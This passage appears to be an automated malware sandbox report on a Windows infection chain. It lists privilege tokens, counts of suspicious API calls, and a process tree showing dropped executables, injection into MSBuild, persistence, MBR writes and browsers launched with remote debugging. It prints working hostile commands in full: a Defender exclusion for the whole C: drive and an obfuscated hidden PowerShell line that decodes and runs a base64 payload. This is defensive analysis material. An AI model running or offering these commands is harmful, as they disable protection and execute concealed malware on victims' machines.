SeShutdownPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeSystemEnvironmentPrivilege 2756 powershell.exe Token: SeRemoteShutdownPrivilege 2756 powershell.exe Token: SeUndockPrivilege 2756 powershell.exe Token: SeManageVolumePrivilege 2756 powershell.exe Token: 33 2756 powershell.exe Token: 34 2756 powershell.exe Token: 35 2756 powershell.exe Token: 36 2756 powershell.exe Token: SeImpersonatePrivilege 1320 MSBuild.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeImpersonatePrivilege 1320 MSBuild.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: 33 5448 taskmgr.exe Token: SeIncBasePriorityPrivilege 5448 taskmgr.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeImpersonatePrivilege 1384 GitcS6s.exe Token: SeImpersonatePrivilege 1384 GitcS6s.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeImpersonatePrivilege 2740 MSBuild.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeImpersonatePrivilege 2740 MSBuild.exe Token: SeShutdownPrivilege 12408 chrome.exe Token: SeCreatePagefilePrivilege 12408 chrome.exe Token: SeShutdownPrivilege 12408 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4544 FC8EB13MXLKFC6SOSHM0CW5GA1.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 5448 taskmgr.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 5448 taskmgr.exe 12408 chrome.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 5448 taskmgr.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe -
Suspicious use of SetWindowsHookEx 32 IoCs
pid Process 12128 ynjrybyoa.exe 12276 ynjrybyoa.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 3712 utxikedhsa.exe 3424 utxikedhsa.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe 8024 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5224 wrote to memory of 4544 5224 random.exe 86 PID 5224 wrote to memory of 4544 5224 random.exe 86 PID 5224 wrote to memory of 4544 5224 random.exe 86 PID 4544 wrote to memory of 5704 4544 FC8EB13MXLKFC6SOSHM0CW5GA1.exe 87 PID 4544 wrote to memory of 5704 4544 FC8EB13MXLKFC6SOSHM0CW5GA1.exe 87 PID 4544 wrote to memory of 5704 4544 FC8EB13MXLKFC6SOSHM0CW5GA1.exe 87 PID 5704 wrote to memory of 3932 5704 namez.exe 94 PID 5704 wrote to memory of 3932 5704 namez.exe 94 PID 3932 wrote to memory of 5384 3932 1fb3acb064.exe 95 PID 3932 wrote to memory of 5384 3932 1fb3acb064.exe 95 PID 3932 wrote to memory of 5384 3932 1fb3acb064.exe 95 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 3932 wrote to memory of 2840 3932 1fb3acb064.exe 96 PID 5704 wrote to memory of 4604 5704 namez.exe 97 PID 5704 wrote to memory of 4604 5704 namez.exe 97 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 4604 wrote to memory of 3752 4604 LAc2heq.exe 99 PID 5704 wrote to memory of 2696 5704 namez.exe 100 PID 5704 wrote to memory of 2696 5704 namez.exe 100 PID 5704 wrote to memory of 2696 5704 namez.exe 100 PID 5704 wrote to memory of 3244 5704 namez.exe 101 PID 5704 wrote to memory of 3244 5704 namez.exe 101 PID 5704 wrote to memory of 3244 5704 namez.exe 101 PID 3244 wrote to memory of 2884 3244 235T1TS.exe 103 PID 3244 wrote to memory of 2884 3244 235T1TS.exe 103 PID 3244 wrote to memory of 5608 3244 235T1TS.exe 105 PID 3244 wrote to memory of 5608 3244 235T1TS.exe 105 PID 2884 wrote to memory of 2756 2884 cmd.exe 109 PID 2884 wrote to memory of 2756 2884 cmd.exe 109 PID 5704 wrote to memory of 1404 5704 namez.exe 114 PID 5704 wrote to memory of 1404 5704 namez.exe 114 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 1404 wrote to memory of 1320 1404 xztOH3r.exe 115 PID 5608 wrote to memory of 5980 5608 svchost.exe 116 PID 5608 wrote to memory of 5980 5608 svchost.exe 116 PID 5608 wrote to memory of 1628 5608 svchost.exe 117 PID 5608 wrote to memory of 1628 5608 svchost.exe 117 PID 5608 wrote to memory of 2316 5608 svchost.exe 119 PID 5608 wrote to memory of 2316 5608 svchost.exe 119 PID 5704 wrote to memory of 13152 5704 namez.exe 122 PID 5704 wrote to memory of 13152 5704 namez.exe 122 PID 5704 wrote to memory of 13152 5704 namez.exe 122 PID 12408 wrote to memory of 13176 12408 chrome.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3088
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵PID:10020
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6404
-
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5224 -
C:\Users\Admin\AppData\Local\Temp\FC8EB13MXLKFC6SOSHM0CW5GA1.exe"C:\Users\Admin\AppData\Local\Temp\FC8EB13MXLKFC6SOSHM0CW5GA1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5704 -
C:\Users\Admin\AppData\Local\Temp\10000260101\1fb3acb064.exe"C:\Users\Admin\AppData\Local\Temp\10000260101\1fb3acb064.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:5384
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001030101\LAc2heq.exe"C:\Users\Admin\AppData\Local\Temp\10001030101\LAc2heq.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001850101\Hmcm0Oj.exe"C:\Users\Admin\AppData\Local\Temp\10001850101\Hmcm0Oj.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\10004650101\235T1TS.exe"C:\Users\Admin\AppData\Local\Temp\10004650101\235T1TS.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"5⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5608 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""6⤵
- Executes dropped EXE
PID:5980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """6⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""6⤵
- Deletes itself
- Executes dropped EXE
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\{409ae252-af48-4045-93be-f07644709986}\5be2288.exe"C:\Users\Admin\AppData\Local\Temp\{409ae252-af48-4045-93be-f07644709986}\5be2288.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:9760 -
C:\Users\Admin\AppData\Local\Temp\{6afd3e43-f742-446a-b8aa-512694160f0d}\8101ae6c.exeC:/Users/Admin/AppData/Local/Temp/{6afd3e43-f742-446a-b8aa-512694160f0d}/\8101ae6c.exe -accepteula -adinsilent -silent -processlevel 2 -postboot8⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Drops startup file
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
PID:11220
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10013260101\xztOH3r.exe"C:\Users\Admin\AppData\Local\Temp\10013260101\xztOH3r.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
-
C:\Users\Admin\AppData\Local\Temp\10036890101\21d3425115.exe"C:\Users\Admin\AppData\Local\Temp\10036890101\21d3425115.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:13152
-
-
C:\Users\Admin\AppData\Local\Temp\10037070101\i5Kz53x.exe"C:\Users\Admin\AppData\Local\Temp\10037070101\i5Kz53x.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:3544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10047800101\GitcS6s.exe"C:\Users\Admin\AppData\Local\Temp\10047800101\GitcS6s.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:8012 -
C:\Windows\SysWOW64\cmd.exeCmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"5⤵
- System Location Discovery: System Language Discovery
PID:5460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
PID:8148 -
C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe"C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe" C:\Users\Admin\AppData\Local\JYhVoaFaykTob.au37⤵
- Executes dropped EXE
PID:10192 -
C:\Windows\SysWOW64\iexpress.exeC:\Windows\SysWOW64\iexpress.exe8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:3108
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10050410101\7IPCJFu.exe"C:\Users\Admin\AppData\Local\Temp\10050410101\7IPCJFu.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8916
-
-
C:\Users\Admin\AppData\Local\Temp\10055800101\zBbvtJ0.exe"C:\Users\Admin\AppData\Local\Temp\10055800101\zBbvtJ0.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10520 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:12084
-
-
-
C:\Users\Admin\AppData\Local\Temp\10060750101\WE297Tp.exe"C:\Users\Admin\AppData\Local\Temp\10060750101\WE297Tp.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:5116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5576 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
PID:11408 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x21c,0x22c,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd107⤵PID:11448
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:8936 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd107⤵PID:892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2096,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=2092 /prefetch:27⤵PID:10076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=1992 /prefetch:37⤵PID:10172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=2412 /prefetch:87⤵PID:5536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=3208 /prefetch:17⤵
- Uses browser remote debugging
PID:10276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=3240 /prefetch:17⤵
- Uses browser remote debugging
PID:4412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=4444 /prefetch:17⤵
- Uses browser remote debugging
PID:10880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5064,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=5068 /prefetch:87⤵PID:12048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=5340 /prefetch:87⤵PID:548
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:12664 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ff84679f208,0x7ff84679f214,0x7ff84679f2207⤵PID:12764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:37⤵PID:9240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:27⤵PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1880,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:87⤵PID:9320
-
-
